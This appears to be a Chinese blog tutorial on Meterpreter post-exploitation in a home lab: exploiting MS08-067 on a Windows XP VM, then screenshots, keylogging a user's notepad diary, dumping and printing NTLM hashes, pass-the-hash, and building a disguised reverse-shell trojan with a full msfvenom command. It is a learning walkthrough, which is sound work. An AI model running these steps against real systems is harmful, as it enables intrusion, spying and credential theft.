Meterpreter渗透测试入门
又是一个下雨的星期天,小黑ailx10开始了渗透测试实验之旅。这篇文章通过实验的方式、踩坑,利用漏洞ms080-067成功入侵WinXP靶机后,后渗透测试工程师Meterpreter掌握的几个最最最基本操作。比如查看靶机信息、截屏、获取键盘记录、收集密码、权限提升等。你也可以参考David Kennedy的《Metasploit:The Penetration Tester's Guide》,清华大学诸葛建伟老师翻译的《Metasploit渗透测试指南》进行实验。
- 虚拟靶机:192.168.0.106(WinXP@hu、ailx13、ailx14用户)
- 虚拟小黑:192.168.0.104(Kali@ailx10)
第一步:初始化环境>在靶机上关闭防火墙
通过Nmap对端口进行扫描,我们看到了靶机上开放了135、139、445、3389高危端口
第二步:在虚拟小黑上对虚拟靶机进行ms08067漏洞扫描
nmap -sT -A --script=smb-vuln-ms08-067 -P0 192.168.0.102
第三步:配置参数获得Shell大功告成
第四步:使用screenshot命令截屏
第五步:使用sysinfo命令查看计算机信息
第六步:使用ps命令查看系统运行的进程
找到记事本进程1524,后面可以记录虚拟靶机用户(学生ailx12)在记事本中写日记的内容。
第七步:使用run post/windows/capture/keylog_recorder命令获取键盘记录
第八步:在靶机的记事本中打字,写下今天的日记
第九步:查看键盘记录的内容,成功看到虚拟靶机的记事本内容
- 黑客会给你发一个网站,然后记录你在浏览器中输入的用户名和密码
- 如果你的电脑中了木马,只要你敲键盘,你的动作可能都会被捕捉
第十步:使用run post/windows/gather/hashdump命usr令获取密码哈希值
仔细观察,发现3个哈希值都是aad3b435开头,它表示空密码~
Administrator:500:4159e786e2e935f8aad3b435b51404ee:28adbdb0c21b79ae0fc8a817134ed8c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9c5947b6961aa6c42c79a4f95229c735:1c8efd34c3f4a30e9b65f4b63f2ea519:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:cf2a6e72fed6f0f0378af0c9b52e9332:::
hu:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
我们可以通过shell命令进入cmd命令行模式
第十一步:传递哈希值
我们短时间破解不了哈希值的明文,怎么进一步呢?这里就要用到哈希传递技术。
在实验的过程中,遇到了坑,竟然不能用了,在XP上测试无效...
遇到这种事情不要慌,有时候换个系统就好了,环境问题都是小问题,多折腾就明白了。
第十二步:权限提升
首先通过net user 创建2个普通用户ailx13和ailx14
生成一个虚拟XP系统专用木马,放都虚拟靶机桌面,你可以假设这个以Love伪装的木马被用户ailx13下载了
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=443 -f exe -o ailx13_love.exe
在虚拟小黑上监听咱们的这个木马
当虚拟靶机用户ailx13运行了木马程序ailx13-love,咱们的虚拟小黑就获得了一个Shell
在虚拟靶机上也可以验证,通过netstat命令可以看到它和虚拟小黑建立了https连接
虽然XP专属木马ailx13-love生效了,但是ailx13用户是个普通用户,想通过use priv命令进行提权失败了,并不能提升成管理员。哈哈,环境问题,都是小问题不要在意。
提权2步法:实验环境并没有生效,getuid发现还是ailx13用户,并不是system用户。WinXP系统太老了,没人用了,建议大家在Win7上面试试~
- use priv
- getsystem
关于内网横向移动、跳板机,敬请期待下一篇专栏文章,谢谢阅读~
Meterpreter渗透测试入门相关推荐
- 渗透测试入门24之渗透测试参考书、课程、工具、认证
白帽子渗透测试入门资源:参考书.课程.工具.认证文章目录 前言 名词解析 Pwk课程与OSCP证书 CTF 工具 参考书 相关文献推荐 资源打包前言 初入渗透测试领域,过程中遇到不少错综复杂的知识,也 ...
- 渗透测试入门7之权限维持
渗透测试入门7之权限维持 系统后门 Windows 1.密码记录工具 WinlogonHack WinlogonHack 是一款用来劫取远程3389登录密码的工具,在 WinlogonHack 之前有 ...
- Android渗透测试Android渗透测试入门教程大学霸
Android渗透测试Android渗透测试入门教程大学霸 第1章 Android渗透测试 Android是一种基于Linux的自由及开放源代码的操作系统,主要用于移动设备,如智能手机.平板等.目前 ...
- 渗透测试入门1之信息收集
渗透测试入门1之信息收集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 子域名获取 字典列表 邮箱列表获 ...
- 渗透测试入门3之隐匿攻击
渗透测试入门3之隐匿攻击 1. Command and Control ICMP :https://pentestlab.blog/2017/07/28/command-and-control-icm ...
- 渗透测试入门9之域渗透
渗透测试入门9之域渗透 信息搜集 powerview.ps1 Get-NetDomain - gets the name of the current user's domain Get-NetFor ...
- 渗透测试入门8之端口渗透
渗透测试入门8之端口渗透 端口扫描 1.端口的指纹信息(版本信息) 2.端口所对应运行的服务 3.常见的默认端口号 4.尝试弱口令 端口爆破 hydra 端口弱口令 NTScan Hscan 自写脚本 ...
- 渗透测试入门6之权限提升
渗透测试入门6之权限提升 Windows BypassUAC 常用方法 使用IFileOperation COM接口 使用Wusa.exe的extract选项 远程注入SHELLCODE 到傀儡进程 ...
- 渗透测试入门5之内网信息搜集
渗透测试入门5之内网信息搜集 本机信息搜集 1.用户列表 windows用户列表 分析邮件用户,内网[域]邮件用户,通常就是内网[域]用户 2.进程列表 分析杀毒软件/安全监控工具等 邮件客户端 VP ...
最新文章
- Python中文处理(转)
- 单变量离散傅里叶变换DFT原理及实现
- c++ opencv添加logo_OpenCV-Python 图像平滑 | 十六
- 华为手机打字声音怎么开启_华为手机这5个超实用小功能,记得要开启,谁用都说好...
- java i o总结_Java I/O 总结
- jstack 脚本 自动日志_深入理解jstack日志
- 20172329 2017-2018-2《程序设计与数据结构》课程总结
- VB的阶乘和伽马函数
- Qt 二维码文件传输工具
- 苹果电脑系统更新中断怎么办_苹果发布健身公告中断按需锻炼空间
- wps转换成word如何实现?不妨试试这两个小技巧
- Hazel引擎学习(六)
- visual studio 2010 没有代码提示(智能提示)或代码提示很慢解决方案一例
- 服务器并发处理是什么?
- html 苏宁首页,简单实现
- 在vscode中打开.md文件
- 记录一下pageX,offsetX,clientX,offsetLeft,offsetWidth,pageYoffset,scrollTop,scrollY,等。原文摘自MDN文档库。保证正确。
- Python列表的相关操作
- 机器人瓦力有什么西方的风格_机器人瓦力观后感 英文
- errors were encountered while processing qmail qmail-run